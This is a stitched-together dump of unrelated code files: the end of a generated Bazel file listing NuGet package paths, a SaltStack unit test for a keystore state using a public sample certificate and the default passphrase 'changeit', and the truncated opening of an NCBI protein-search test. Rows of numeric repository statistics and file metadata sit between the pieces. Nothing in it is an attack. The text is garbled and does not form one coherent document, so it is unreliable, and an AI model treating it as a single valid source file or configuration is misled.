"netcoreapp3.1": "lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
},
net_lib = {
"net45": "lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"net451": "lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"net452": "lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"net46": "lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"net461": "lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"net462": "lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"net47": "lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"net471": "lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"net472": "lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"net48": "lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"netstandard1.3": "lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.dll",
"netstandard1.4": "lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.dll",
"netstandard1.5": "lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.dll",
"netstandard1.6": "lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.dll",
"netstandard2.0": "lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
"netstandard2.1": "lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
},
mono_lib = "lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
net_deps = {
"net45": [
"@system.runtime.interopservices.runtimeinformation//:net45_net",
],
"net451": [
"@system.runtime.interopservices.runtimeinformation//:net451_net",
],
"net452": [
"@system.runtime.interopservices.runtimeinformation//:net452_net",
],
"net46": [
"@system.runtime.interopservices.runtimeinformation//:net46_net",
],
"net461": [
"@system.runtime.interopservices.runtimeinformation//:net461_net",
],
"net462": [
"@system.runtime.interopservices.runtimeinformation//:net462_net",
],
"net47": [
"@system.runtime.interopservices.runtimeinformation//:net47_net",
],
"net471": [
"@system.runtime.interopservices.runtimeinformation//:net471_net",
],
"net472": [
"@system.runtime.interopservices.runtimeinformation//:net472_net",
],
"net48": [
"@system.runtime.interopservices.runtimeinformation//:net48_net",
],
"netstandard1.3": [
"@system.runtime.interopservices.runtimeinformation//:netstandard1.3_net",
],
"netstandard1.4": [
"@system.runtime.interopservices.runtimeinformation//:netstandard1.4_net",
],
"netstandard1.5": [
"@system.runtime.interopservices.runtimeinformation//:netstandard1.5_net",
],
"netstandard1.6": [
"@system.runtime.interopservices.runtimeinformation//:netstandard1.6_net",
],
},
mono_deps = [
"@system.runtime.interopservices.runtimeinformation//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.xml",
],
"netcoreapp2.1": [
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.xml",
],
"netcoreapp3.0": [
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.xml",
],
"netcoreapp3.1": [
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.xml",
],
},
net_files = {
"net45": [
"lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/net45/Microsoft.DotNet.PlatformAbstractions.xml",
],
"net451": [
"lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/net45/Microsoft.DotNet.PlatformAbstractions.xml",
],
"net452": [
"lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/net45/Microsoft.DotNet.PlatformAbstractions.xml",
],
"net46": [
"lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/net45/Microsoft.DotNet.PlatformAbstractions.xml",
],
"net461": [
"lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/net45/Microsoft.DotNet.PlatformAbstractions.xml",
],
"net462": [
"lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/net45/Microsoft.DotNet.PlatformAbstractions.xml",
],
"net47": [
"lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/net45/Microsoft.DotNet.PlatformAbstractions.xml",
],
"net471": [
"lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/net45/Microsoft.DotNet.PlatformAbstractions.xml",
],
"net472": [
"lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/net45/Microsoft.DotNet.PlatformAbstractions.xml",
],
"net48": [
"lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/net45/Microsoft.DotNet.PlatformAbstractions.xml",
],
"netstandard1.3": [
"lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.xml",
],
"netstandard1.4": [
"lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.xml",
],
"netstandard1.5": [
"lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.xml",
],
"netstandard1.6": [
"lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.xml",
],
"netstandard2.0": [
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.xml",
],
"netstandard2.1": [
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.xml",
],
},
mono_files = [
"lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/net45/Microsoft.DotNet.PlatformAbstractions.xml",
],
)
nuget_package(
name = "system.security.cryptography.protecteddata",
package = "system.security.cryptography.protecteddata",
version = "4.5.0",
sha256 = "67e5f5676944acb2fb627b768c5b3392eebf220ae780edd5d5b49f6530621487",
core_lib = {
"netcoreapp2.0": "lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
"netcoreapp2.1": "lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
"netcoreapp3.0": "lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
"netcoreapp3.1": "lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
},
core_ref = {
"netcoreapp2.0": "ref/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
"netcoreapp2.1": "ref/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
"netcoreapp3.0": "ref/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
"netcoreapp3.1": "ref/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
},
net_lib = {
"net46": "lib/net46/System.Security.Cryptography.ProtectedData.dll",
"net461": "lib/net461/System.Security.Cryptography.ProtectedData.dll",
"net462": "lib/net461/System.Security.Cryptography.ProtectedData.dll",
"net47": "lib/net461/System.Security.Cryptography.ProtectedData.dll",
"net471": "lib/net461/System.Security.Cryptography.ProtectedData.dll",
"net472": "lib/net461/System.Security.Cryptography.ProtectedData.dll",
"net48": "lib/net461/System.Security.Cryptography.ProtectedData.dll",
"netstandard1.3": "lib/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
"netstandard1.4": "lib/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
"netstandard1.5": "lib/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
"netstandard1.6": "lib/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
"netstandard2.0": "lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
"netstandard2.1": "lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
},
net_ref = {
"net46": "ref/net46/System.Security.Cryptography.ProtectedData.dll",
"net461": "ref/net461/System.Security.Cryptography.ProtectedData.dll",
"net462": "ref/net461/System.Security.Cryptography.ProtectedData.dll",
"net47": "ref/net461/System.Security.Cryptography.ProtectedData.dll",
"net471": "ref/net461/System.Security.Cryptography.ProtectedData.dll",
"net472": "ref/net461/System.Security.Cryptography.ProtectedData.dll",
"net48": "ref/net461/System.Security.Cryptography.ProtectedData.dll",
"netstandard1.3": "ref/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
"netstandard1.4": "ref/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
"netstandard1.5": "ref/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
"netstandard1.6": "ref/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
"netstandard2.0": "ref/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
"netstandard2.1": "ref/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
},
mono_lib = "lib/net461/System.Security.Cryptography.ProtectedData.dll",
mono_ref = "ref/net461/System.Security.Cryptography.ProtectedData.dll",
core_files = {
"netcoreapp2.0": [
"lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
],
"netcoreapp2.1": [
"lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
],
"netcoreapp3.0": [
"lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
],
"netcoreapp3.1": [
"lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
],
},
net_files = {
"net46": [
"lib/net46/System.Security.Cryptography.ProtectedData.dll",
],
"net461": [
"lib/net461/System.Security.Cryptography.ProtectedData.dll",
],
"net462": [
"lib/net461/System.Security.Cryptography.ProtectedData.dll",
],
"net47": [
"lib/net461/System.Security.Cryptography.ProtectedData.dll",
],
"net471": [
"lib/net461/System.Security.Cryptography.ProtectedData.dll",
],
"net472": [
"lib/net461/System.Security.Cryptography.ProtectedData.dll",
],
"net48": [
"lib/net461/System.Security.Cryptography.ProtectedData.dll",
],
"netstandard1.3": [
"lib/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
],
"netstandard1.4": [
"lib/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
],
"netstandard1.5": [
"lib/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
],
"netstandard1.6": [
"lib/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
],
"netstandard2.0": [
"lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
],
"netstandard2.1": [
"lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
],
},
mono_files = [
"lib/net461/System.Security.Cryptography.ProtectedData.dll",
],
)
### End of generated by the tool
return | 48.475309 | 105 | 0.585199 | 4,550 | 54,971 | 7.04022 | 0.02044 | 0.073861 | 0.073924 | 0.100677 | 0.934474 | 0.908157 | 0.881872 | 0.784784 | 0.703212 | 0.535354 | 0 | 0.064979 | 0.281348 | 54,971 | 1,134 | 106 | 48.475309 | 0.74588 | 0.00091 | 0 | 0.700265 | 1 | 0 | 0.6295 | 0.550924 | 0 | 0 | 0 | 0 | 0 | 1 | 0.000884 | true | 0 | 0 | 0 | 0.001768 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
8b334b563f12688d540b6852c25cccc249498cd8 | 17,026 | py | Python | tests/unit/states/test_keystore.py | ifraixedes/saltstack-salt | b54becb8b43cc9b7c00b2c0bc637ac534dc62896 | [
"Apache-2.0"
] | 3 | 2015-08-30T04:23:47.000Z | 2018-07-15T00:35:23.000Z | tests/unit/states/test_keystore.py | ifraixedes/saltstack-salt | b54becb8b43cc9b7c00b2c0bc637ac534dc62896 | [
"Apache-2.0"
] | 4 | 2016-05-10T22:05:34.000Z | 2016-05-20T18:10:13.000Z | tests/unit/states/test_keystore.py | ifraixedes/saltstack-salt | b54becb8b43cc9b7c00b2c0bc637ac534dc62896 | [
"Apache-2.0"
] | 1 | 2019-12-17T13:37:16.000Z | 2019-12-17T13:37:16.000Z | """
Test cases for keystore state
"""
import salt.states.keystore as keystore
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.mock import MagicMock, patch
from tests.support.unit import TestCase
class KeystoreTestCase(TestCase, LoaderModuleMockMixin):
"""
Test cases for salt.states.keystore
"""
def setup_loader_modules(self):
return {keystore: {"__opts__": {"test": False}}}
@patch("os.path.exists", MagicMock(return_value=True))
def test_cert_already_present(self):
"""
Test for existing value_present
"""
cert_return = [
{
"valid_until": "August 21 2017",
"sha1": "07:1C:B9:4F:0C:C8:51:4D:02:41:24:70:8E:E8:B2:68:7B:D7:D9:D5",
"valid_start": "August 22 2012",
"type": "TrustedCertEntry",
"alias": "stringhost",
"expired": True,
}
]
x509_return = {
"Not After": "2017-08-21 05:26:54",
"Subject Hash": "97:95:14:4F",
"Serial Number": "0D:FA",
"SHA1 Finger Print": (
"07:1C:B9:4F:0C:C8:51:4D:02:41:24:70:8E:E8:B2:68:7B:D7:D9:D5"
),
"SHA-256 Finger Print": "5F:0F:B5:16:65:81:AA:E6:4A:10:1C:15:83:B1:BE:BE:74:E8:14:A9:1E:7A:8A:14:BA:1E:83:5D:78:F6:E9:E7",
"MD5 Finger Print": "80:E6:17:AF:78:D8:E4:B8:FB:5F:41:3A:27:1D:CC:F2",
"Version": 1,
"Key Size": 512,
"Public Key": (
"-----BEGIN PUBLIC"
" KEY-----\nMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJv8ZpB5hEK7qxP9K3v43hUS5fGT4waK\ne7ix4Z4mu5UBv+cw7WSFAt0Vaag0sAbsPzU8Hhsrj/qPABvfB8asUwcCAwEAAQ==\n-----END"
" PUBLIC KEY-----\n"
),
"Issuer": {
"C": "JP",
"organizationName": "Frank4DD",
"CN": "Frank4DD Web CA",
"SP": "Tokyo",
"L": "Chuo-ku",
"emailAddress": "support@frank4dd.com",
"OU": "WebCert Support",
},
"Issuer Hash": "92:DA:45:6B",
"Not Before": "2012-08-22 05:26:54",
"Subject": {
"C": "JP",
"SP": "Tokyo",
"organizationName": "Frank4DD",
"CN": "www.example.com",
},
}
name = "keystore.jks"
passphrase = "changeit"
entries = [
{
"alias": "stringhost",
"certificate": """-----BEGIN CERTIFICATE-----
MIICEjCCAXsCAg36MA0GCSqGSIb3DQEBBQUAMIGbMQswCQYDVQQGEwJKUDEOMAwG
A1UECBMFVG9reW8xEDAOBgNVBAcTB0NodW8ta3UxETAPBgNVBAoTCEZyYW5rNERE
MRgwFgYDVQQLEw9XZWJDZXJ0IFN1cHBvcnQxGDAWBgNVBAMTD0ZyYW5rNEREIFdl
YiBDQTEjMCEGCSqGSIb3DQEJARYUc3VwcG9ydEBmcmFuazRkZC5jb20wHhcNMTIw
ODIyMDUyNjU0WhcNMTcwODIxMDUyNjU0WjBKMQswCQYDVQQGEwJKUDEOMAwGA1UE
CAwFVG9reW8xETAPBgNVBAoMCEZyYW5rNEREMRgwFgYDVQQDDA93d3cuZXhhbXBs
ZS5jb20wXDANBgkqhkiG9w0BAQEFAANLADBIAkEAm/xmkHmEQrurE/0re/jeFRLl
8ZPjBop7uLHhnia7lQG/5zDtZIUC3RVpqDSwBuw/NTweGyuP+o8AG98HxqxTBwID
AQABMA0GCSqGSIb3DQEBBQUAA4GBABS2TLuBeTPmcaTaUW/LCB2NYOy8GMdzR1mx
8iBIu2H6/E2tiY3RIevV2OW61qY2/XRQg7YPxx3ffeUugX9F4J/iPnnu1zAxxyBy
2VguKv4SWjRFoRkIfIlHX0qVviMhSlNy2ioFLy7JcPZb+v3ftDGywUqcBiVDoea0
Hn+GmxZA\n-----END CERTIFICATE-----""",
}
]
state_return = {
"name": name,
"changes": {},
"result": True,
"comment": "No changes made.\n",
}
# with patch.dict(keystore.__opts__, {'test': False}):
with patch.dict(
keystore.__salt__, {"keystore.list": MagicMock(return_value=cert_return)}
):
with patch.dict(
keystore.__salt__,
{"x509.read_certificate": MagicMock(return_value=x509_return)},
):
self.assertDictEqual(
keystore.managed(name, passphrase, entries), state_return
)
with patch.dict(keystore.__opts__, {"test": True}):
with patch.dict(
keystore.__salt__,
{"keystore.list": MagicMock(return_value=cert_return)},
):
with patch.dict(
keystore.__salt__,
{"x509.read_certificate": MagicMock(return_value=x509_return)},
):
self.assertDictEqual(
keystore.managed(name, passphrase, entries), state_return
)
@patch("os.path.exists", MagicMock(return_value=True))
def test_cert_update(self):
"""
Test for existing value_present
"""
cert_return = [
{
"valid_until": "August 21 2017",
"sha1": "07:1C:B9:4F:0C:C8:51:4D:02:41:24:70:8E:E8:B2:68:7B:D7:D9:D5",
"valid_start": "August 22 2012",
"type": "TrustedCertEntry",
"alias": "stringhost",
"expired": True,
}
]
x509_return = {
"Not After": "2017-08-21 05:26:54",
"Subject Hash": "97:95:14:4F",
"Serial Number": "0D:FA",
"SHA1 Finger Print": (
"07:1C:B9:4F:0C:C8:51:4D:02:41:24:70:8E:E8:B2:68:7B:D7:D9:D6"
),
"SHA-256 Finger Print": "5F:0F:B5:16:65:81:AA:E6:4A:10:1C:15:83:B1:BE:BE:74:E8:14:A9:1E:7A:8A:14:BA:1E:83:5D:78:F6:E9:E7",
"MD5 Finger Print": "80:E6:17:AF:78:D8:E4:B8:FB:5F:41:3A:27:1D:CC:F2",
"Version": 1,
"Key Size": 512,
"Public Key": (
"-----BEGIN PUBLIC"
" KEY-----\nMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJv8ZpB5hEK7qxP9K3v43hUS5fGT4waK\ne7ix4Z4mu5UBv+cw7WSFAt0Vaag0sAbsPzU8Hhsrj/qPABvfB8asUwcCAwEAAQ==\n-----END"
" PUBLIC KEY-----\n"
),
"Issuer": {
"C": "JP",
"organizationName": "Frank4DD",
"CN": "Frank4DD Web CA",
"SP": "Tokyo",
"L": "Chuo-ku",
"emailAddress": "support@frank4dd.com",
"OU": "WebCert Support",
},
"Issuer Hash": "92:DA:45:6B",
"Not Before": "2012-08-22 05:26:54",
"Subject": {
"C": "JP",
"SP": "Tokyo",
"organizationName": "Frank4DD",
"CN": "www.example.com",
},
}
name = "keystore.jks"
passphrase = "changeit"
entries = [
{
"alias": "stringhost",
"certificate": """-----BEGIN CERTIFICATE-----
MIICEjCCAXsCAg36MA0GCSqGSIb3DQEBBQUAMIGbMQswCQYDVQQGEwJKUDEOMAwG
A1UECBMFVG9reW8xEDAOBgNVBAcTB0NodW8ta3UxETAPBgNVBAoTCEZyYW5rNERE
MRgwFgYDVQQLEw9XZWJDZXJ0IFN1cHBvcnQxGDAWBgNVBAMTD0ZyYW5rNEREIFdl
YiBDQTEjMCEGCSqGSIb3DQEJARYUc3VwcG9ydEBmcmFuazRkZC5jb20wHhcNMTIw
ODIyMDUyNjU0WhcNMTcwODIxMDUyNjU0WjBKMQswCQYDVQQGEwJKUDEOMAwGA1UE
CAwFVG9reW8xETAPBgNVBAoMCEZyYW5rNEREMRgwFgYDVQQDDA93d3cuZXhhbXBs
ZS5jb20wXDANBgkqhkiG9w0BAQEFAANLADBIAkEAm/xmkHmEQrurE/0re/jeFRLl
8ZPjBop7uLHhnia7lQG/5zDtZIUC3RVpqDSwBuw/NTweGyuP+o8AG98HxqxTBwID
AQABMA0GCSqGSIb3DQEBBQUAA4GBABS2TLuBeTPmcaTaUW/LCB2NYOy8GMdzR1mx
8iBIu2H6/E2tiY3RIevV2OW61qY2/XRQg7YPxx3ffeUugX9F4J/iPnnu1zAxxyBy
2VguKv4SWjRFoRkIfIlHX0qVviMhSlNy2ioFLy7JcPZb+v3ftDGywUqcBiVDoea0
Hn+GmxZA\n-----END CERTIFICATE-----""",
}
]
test_return = {
"name": name,
"changes": {},
"result": None,
"comment": "Alias stringhost would have been updated\n",
}
state_return = {
"name": name,
"changes": {"stringhost": "Updated"},
"result": True,
"comment": "Alias stringhost updated.\n",
}
with patch.dict(keystore.__opts__, {"test": True}):
with patch.dict(
keystore.__salt__,
{"keystore.list": MagicMock(return_value=cert_return)},
):
with patch.dict(
keystore.__salt__,
{"x509.read_certificate": MagicMock(return_value=x509_return)},
):
self.assertDictEqual(
keystore.managed(name, passphrase, entries), test_return
)
with patch.dict(
keystore.__salt__, {"keystore.list": MagicMock(return_value=cert_return)}
):
with patch.dict(
keystore.__salt__,
{"x509.read_certificate": MagicMock(return_value=x509_return)},
):
with patch.dict(
keystore.__salt__, {"keystore.remove": MagicMock(return_value=True)}
):
with patch.dict(
keystore.__salt__,
{"keystore.add": MagicMock(return_value=True)},
):
self.assertDictEqual(
keystore.managed(name, passphrase, entries), state_return
)
@patch("os.path.exists", MagicMock(return_value=False))
def test_new_file(self):
"""
Test for existing value_present
"""
name = "keystore.jks"
passphrase = "changeit"
entries = [
{
"alias": "stringhost",
"certificate": """-----BEGIN CERTIFICATE-----
MIICEjCCAXsCAg36MA0GCSqGSIb3DQEBBQUAMIGbMQswCQYDVQQGEwJKUDEOMAwG
A1UECBMFVG9reW8xEDAOBgNVBAcTB0NodW8ta3UxETAPBgNVBAoTCEZyYW5rNERE
MRgwFgYDVQQLEw9XZWJDZXJ0IFN1cHBvcnQxGDAWBgNVBAMTD0ZyYW5rNEREIFdl
YiBDQTEjMCEGCSqGSIb3DQEJARYUc3VwcG9ydEBmcmFuazRkZC5jb20wHhcNMTIw
ODIyMDUyNjU0WhcNMTcwODIxMDUyNjU0WjBKMQswCQYDVQQGEwJKUDEOMAwGA1UE
CAwFVG9reW8xETAPBgNVBAoMCEZyYW5rNEREMRgwFgYDVQQDDA93d3cuZXhhbXBs
ZS5jb20wXDANBgkqhkiG9w0BAQEFAANLADBIAkEAm/xmkHmEQrurE/0re/jeFRLl
8ZPjBop7uLHhnia7lQG/5zDtZIUC3RVpqDSwBuw/NTweGyuP+o8AG98HxqxTBwID
AQABMA0GCSqGSIb3DQEBBQUAA4GBABS2TLuBeTPmcaTaUW/LCB2NYOy8GMdzR1mx
8iBIu2H6/E2tiY3RIevV2OW61qY2/XRQg7YPxx3ffeUugX9F4J/iPnnu1zAxxyBy
2VguKv4SWjRFoRkIfIlHX0qVviMhSlNy2ioFLy7JcPZb+v3ftDGywUqcBiVDoea0
Hn+GmxZA\n-----END CERTIFICATE-----""",
}
]
test_return = {
"name": name,
"changes": {},
"result": None,
"comment": "Alias stringhost would have been added\n",
}
state_return = {
"name": name,
"changes": {"stringhost": "Added"},
"result": True,
"comment": "Alias stringhost added.\n",
}
with patch.dict(keystore.__opts__, {"test": True}):
self.assertDictEqual(
keystore.managed(name, passphrase, entries), test_return
)
with patch.dict(
keystore.__salt__, {"keystore.remove": MagicMock(return_value=True)}
):
with patch.dict(
keystore.__salt__, {"keystore.add": MagicMock(return_value=True)}
):
self.assertDictEqual(
keystore.managed(name, passphrase, entries), state_return
)
@patch("os.path.exists", MagicMock(return_value=True))
def test_force_remove(self):
"""
Test for existing value_present
"""
cert_return = [
{
"valid_until": "August 21 2017",
"sha1": "07:1C:B9:4F:0C:C8:51:4D:02:41:24:70:8E:E8:B2:68:7B:D7:D9:D5",
"valid_start": "August 22 2012",
"type": "TrustedCertEntry",
"alias": "oldhost",
"expired": True,
}
]
x509_return = {
"Not After": "2017-08-21 05:26:54",
"Subject Hash": "97:95:14:4F",
"Serial Number": "0D:FA",
"SHA1 Finger Print": (
"07:1C:B9:4F:0C:C8:51:4D:02:41:24:70:8E:E8:B2:68:7B:D7:D9:D6"
),
"SHA-256 Finger Print": "5F:0F:B5:16:65:81:AA:E6:4A:10:1C:15:83:B1:BE:BE:74:E8:14:A9:1E:7A:8A:14:BA:1E:83:5D:78:F6:E9:E7",
"MD5 Finger Print": "80:E6:17:AF:78:D8:E4:B8:FB:5F:41:3A:27:1D:CC:F2",
"Version": 1,
"Key Size": 512,
"Public Key": (
"-----BEGIN PUBLIC"
" KEY-----\nMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJv8ZpB5hEK7qxP9K3v43hUS5fGT4waK\ne7ix4Z4mu5UBv+cw7WSFAt0Vaag0sAbsPzU8Hhsrj/qPABvfB8asUwcCAwEAAQ==\n-----END"
" PUBLIC KEY-----\n"
),
"Issuer": {
"C": "JP",
"organizationName": "Frank4DD",
"CN": "Frank4DD Web CA",
"SP": "Tokyo",
"L": "Chuo-ku",
"emailAddress": "support@frank4dd.com",
"OU": "WebCert Support",
},
"Issuer Hash": "92:DA:45:6B",
"Not Before": "2012-08-22 05:26:54",
"Subject": {
"C": "JP",
"SP": "Tokyo",
"organizationName": "Frank4DD",
"CN": "www.example.com",
},
}
name = "keystore.jks"
passphrase = "changeit"
entries = [
{
"alias": "stringhost",
"certificate": """-----BEGIN CERTIFICATE-----
MIICEjCCAXsCAg36MA0GCSqGSIb3DQEBBQUAMIGbMQswCQYDVQQGEwJKUDEOMAwG
A1UECBMFVG9reW8xEDAOBgNVBAcTB0NodW8ta3UxETAPBgNVBAoTCEZyYW5rNERE
MRgwFgYDVQQLEw9XZWJDZXJ0IFN1cHBvcnQxGDAWBgNVBAMTD0ZyYW5rNEREIFdl
YiBDQTEjMCEGCSqGSIb3DQEJARYUc3VwcG9ydEBmcmFuazRkZC5jb20wHhcNMTIw
ODIyMDUyNjU0WhcNMTcwODIxMDUyNjU0WjBKMQswCQYDVQQGEwJKUDEOMAwGA1UE
CAwFVG9reW8xETAPBgNVBAoMCEZyYW5rNEREMRgwFgYDVQQDDA93d3cuZXhhbXBs
ZS5jb20wXDANBgkqhkiG9w0BAQEFAANLADBIAkEAm/xmkHmEQrurE/0re/jeFRLl
8ZPjBop7uLHhnia7lQG/5zDtZIUC3RVpqDSwBuw/NTweGyuP+o8AG98HxqxTBwID
AQABMA0GCSqGSIb3DQEBBQUAA4GBABS2TLuBeTPmcaTaUW/LCB2NYOy8GMdzR1mx
8iBIu2H6/E2tiY3RIevV2OW61qY2/XRQg7YPxx3ffeUugX9F4J/iPnnu1zAxxyBy
2VguKv4SWjRFoRkIfIlHX0qVviMhSlNy2ioFLy7JcPZb+v3ftDGywUqcBiVDoea0
Hn+GmxZA\n-----END CERTIFICATE-----""",
}
]
test_return = {
"name": name,
"changes": {},
"result": None,
"comment": (
"Alias stringhost would have been updated\nAlias oldhost would have"
" been removed"
),
}
state_return = {
"name": name,
"changes": {"oldhost": "Removed", "stringhost": "Updated"},
"result": True,
"comment": "Alias stringhost updated.\nAlias oldhost removed.\n",
}
with patch.dict(keystore.__opts__, {"test": True}):
with patch.dict(
keystore.__salt__,
{"keystore.list": MagicMock(return_value=cert_return)},
):
with patch.dict(
keystore.__salt__,
{"x509.read_certificate": MagicMock(return_value=x509_return)},
):
self.assertDictEqual(
keystore.managed(name, passphrase, entries, force_remove=True),
test_return,
)
with patch.dict(
keystore.__salt__, {"keystore.list": MagicMock(return_value=cert_return)}
):
with patch.dict(
keystore.__salt__,
{"x509.read_certificate": MagicMock(return_value=x509_return)},
):
with patch.dict(
keystore.__salt__, {"keystore.remove": MagicMock(return_value=True)}
):
with patch.dict(
keystore.__salt__,
{"keystore.add": MagicMock(return_value=True)},
):
self.assertDictEqual(
keystore.managed(
name, passphrase, entries, force_remove=True
),
state_return,
)
| 41.026506 | 169 | 0.523611 | 1,319 | 17,026 | 6.622441 | 0.169826 | 0.023698 | 0.03423 | 0.055295 | 0.94356 | 0.933257 | 0.929708 | 0.918947 | 0.902232 | 0.902232 | 0 | 0.085136 | 0.361858 | 17,026 | 414 | 170 | 41.125604 | 0.718822 | 0.014507 | 0 | 0.791328 | 0 | 0.03252 | 0.469455 | 0.25036 | 0 | 0 | 0 | 0 | 0.02168 | 1 | 0.01355 | false | 0.03252 | 0.01084 | 0.00271 | 0.02981 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8b4009bdcc845606257e4405590f27e8a14fe93c | 12,722 | py | Python | testing/NCBI_tests.py | denkovarik/EC-Scrape | e6340fe852b204f4813ec6ede4d20138a85644b6 | [
"MIT"
] | null | null | null | testing/NCBI_tests.py | denkovarik/EC-Scrape | e6340fe852b204f4813ec6ede4d20138a85644b6 | [
"MIT"
] | null | null | null | testing/NCBI_tests.py | denkovarik/EC-Scrape | e6340fe852b204f4813ec6ede4d20138a85644b6 | [
"MIT"
] | null | null | null | import unittest
import os, io, sys, inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0, parentdir)
from classes.NCBI import *
class NCBI_tests(unittest.TestCase):
"""
Runs all tests for the NCBI class.
"""
def test_search(self):
"""
Tests doing a search on the NCBI protein database. PLEASE NOTE THAT
TESTS IN THIS TEST CASE MAY BREAK IF NCBI CHANGES THE ENTRY FOR
THE ACCESSION NUMBER CAI38050. This should be the only test case
that is susceptible to this.
:param self: An instance of the NCBI_tests class.
"""
# naphthoate synthase search
ncbi = NCBI()
accession = "CAI38050"
exp = {
'Protein name': 'naphthoate synthase',
'Organism': 'Corynebacterium jeikeium K411',
'EC Number': '4.1.3.36'
}
email = "dennis.kovarik@mines.sdsmt.edu"
rslt = ncbi.protein.search(accession, email)
self.assertTrue(rslt == exp)
# Test with no expected results
ncbi = NCBI()
accession = "WP_NOT!!!"
email = "dennis.kovarik@mines.sdsmt.edu"
rslt = ncbi.protein.search(accession, email)
self.assertTrue(rslt == None)
def test_extract_ec(self):
"""
